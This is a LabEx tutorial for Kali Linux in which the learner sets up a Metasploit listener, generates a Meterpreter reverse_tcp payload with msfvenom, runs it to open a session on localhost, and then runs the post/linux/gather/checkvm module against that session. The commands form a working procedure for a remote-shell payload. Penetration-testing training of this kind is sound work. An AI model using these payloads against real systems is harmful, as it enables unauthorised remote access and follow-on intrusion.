LabEx
Log InJoin Free

Run a Post-Exploitation Module in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

Post-exploitation is the phase in a penetration test that occurs after an attacker has gained initial access to a target system. During this phase, the goal is to gather more information, escalate privileges, pivot to other systems, and maintain persistent access. The Metasploit Framework provides a vast collection of post-exploitation modules to automate these tasks.

In this lab, you will learn the fundamental workflow for using a post-exploitation module in Metasploit. You will start by establishing a Meterpreter session, then search for a suitable module, configure it, and run it against the active session to gather information about the target system. We will use the post/linux/gather/checkvm module as an example, which attempts to determine if the compromised host is a virtual machine.

Have an active Meterpreter session

In this step, you will set up a listener in Metasploit and then execute a payload to simulate a compromised host connecting back, thereby creating an active Meterpreter session. This session is the prerequisite for running any post-exploitation module.

First, let's start the Metasploit Framework console. Open a terminal and type:

msfconsole -q

The -q flag makes the startup banner quiet. Once you are at the msf6 > prompt, we will configure a listener. We'll use a generic handler and a Linux Meterpreter payload.

Type the following commands into the msfconsole prompt:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 127.0.0.1

Now, run the listener as a background job using exploit -j:

exploit -j

You should see a confirmation that the handler has started.

[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444

Now, open a new terminal (you can use the + button in the terminal tab bar). In this new terminal, we will generate and run the payload that connects back to our listener. We'll use msfvenom to create a Linux executable file.

In the second terminal, execute this command to create the payload:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/shell.elf

This command creates an ELF (Executable and Linkable Format) file named shell.elf in your ~/project directory.

Next, make the file executable:

chmod +x ~/project/shell.elf

Finally, run the payload to establish the session:

./shell.elf

Now, switch back to your first terminal (the one with msfconsole). You should see a message indicating that a new session has been created.

[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38978) at 2023-10-27 10:30:00 -0400

To confirm, you can list all active sessions with the sessions command.

sessions

You will see your active session listed, which means you are ready for the next step.

Active sessions
===============

  Id  Name  Type                     Information  Connection
  --  ----  ----                     -----------  ----------
  1         meterpreter x86/linux               127.0.0.1:4444 -> 127.0.0.1:38978 (127.0.0.1)

Background the session and use the search command for post modules

In this step, you will learn how to interact with your new session and then return to the main msfconsole prompt to search for post-exploitation modules.

After the sessions command, you are at the msf6 > prompt. To interact with the session, use the sessions -i command followed by the session ID.

sessions -i 1

Your prompt will change to meterpreter >, indicating you are now inside the compromised system's session.

[*] Starting interaction with 1...

meterpreter >

To run a post-exploitation module, you need to be at the main msf6 > prompt. To leave the Meterpreter session active but return to the main console, use the background command.

background

You will see a message confirming the session is running in the background, and your prompt will return to msf6 >.

[*] Backgrounding session 1...
msf6 >

Now, you can search for post-exploitation modules using the search command. This command is very powerful and can filter modules by type, platform, name, and more. To find modules that check for virtual machines, you can search for the keyword checkvm.

search checkvm

Metasploit will list all modules matching the keyword.

Matching Modules
================

   ##   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   post/linux/gather/checkvm                             normal  No     Linux Gather Virtual Machine Environment Detection
   1   post/windows/gather/checkvm                           normal  No     Windows Gather Virtual Machine Environment Detection
   ...

This shows us there are modules for both Linux and Windows. Since our session is on a Linux target, we will use post/linux/gather/checkvm.

Select a post-exploitation module like post/linux/gather/checkvm

In this step, you will select the post-exploitation module you found in the previous step and view its configuration options.

To select or "use" a module in Metasploit, you use the use command followed by the full name of the module. Based on our search results, we will use post/linux/gather/checkvm.

use post/linux/gather/checkvm

Your prompt will change to reflect the currently selected module.

msf6 post(linux/gather/checkvm) >

Once a module is selected, you should always check its options to see what needs to be configured. The show options command will display all available settings for the current module.

show options

The output will show the module's options, their current settings, and whether they are required.

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

As you can see, the SESSION option is required, but it does not have a value yet. This option tells Metasploit which of your active sessions to run the module against.

Set the SESSION option to your active session ID

In this step, you will configure the required SESSION option for the post-exploitation module.

From the previous steps, we know our active session has an ID of 1. We need to provide this ID to the module. The set command is used to configure module options.

To set the SESSION option to 1, run the following command:

set SESSION 1

You should see a confirmation that the value has been set.

SESSION => 1

To be certain, you can run show options again to verify that the SESSION option is now correctly configured.

show options

The output will now show 1 as the current setting for SESSION.

Module options (post/linux/gather/checkvm):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

With the SESSION option set, the module is now ready to be executed.

Run the module and analyze the results

In this step, you will execute the configured post-exploitation module and analyze its output.

With the module selected and all required options set, you can now execute it. In Metasploit, you can use either the run or exploit command to execute a module. For post-exploitation modules, run is conventionally used.

run

The module will now execute on the target session (Session 1). It will perform its checks and print the results to your console. The LabEx environment runs inside a virtualized environment, so you should see a positive result.

[*] Checking for Xen...
[+] This is a Xen Virtual Machine
[*] Checking for VMWare...
[*] This does not appear to be a VMWare Virtual Machine.
[*] Checking for VirtualBox...
[*] This does not appear to be a VirtualBox Virtual Machine.
[*] Checking for KVM...
[+] This is a KVM/QEMU Virtual Machine
[*] Checking for Hyper-V...
[*] This does not appear to be a Hyper-V Virtual Machine.
[*] Post module execution completed

Analysis of the results:

The output clearly indicates that the target system is detected as both a Xen and a KVM/QEMU virtual machine. This is valuable intelligence for a penetration tester. Knowing a target is virtualized can influence future actions, such as looking for VM escape vulnerabilities or understanding the underlying infrastructure.

You have now successfully run your first post-exploitation module!

Summary

In this lab, you have learned the essential workflow for using post-exploitation modules within the Metasploit Framework. You successfully performed the entire process from establishing a foothold to gathering intelligence on the target system.

You have learned how to:

  • Create a listener and establish a Meterpreter session.
  • Background an active session to return to the main msfconsole prompt.
  • Use the search command to find relevant post-exploitation modules.
  • Select a module with the use command and view its settings with show options.
  • Configure a module by setting the required SESSION option.
  • Execute the module with the run command and analyze its output.

This fundamental skill is a building block for more advanced post-exploitation activities, such as privilege escalation, credential harvesting, and lateral movement across a network.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux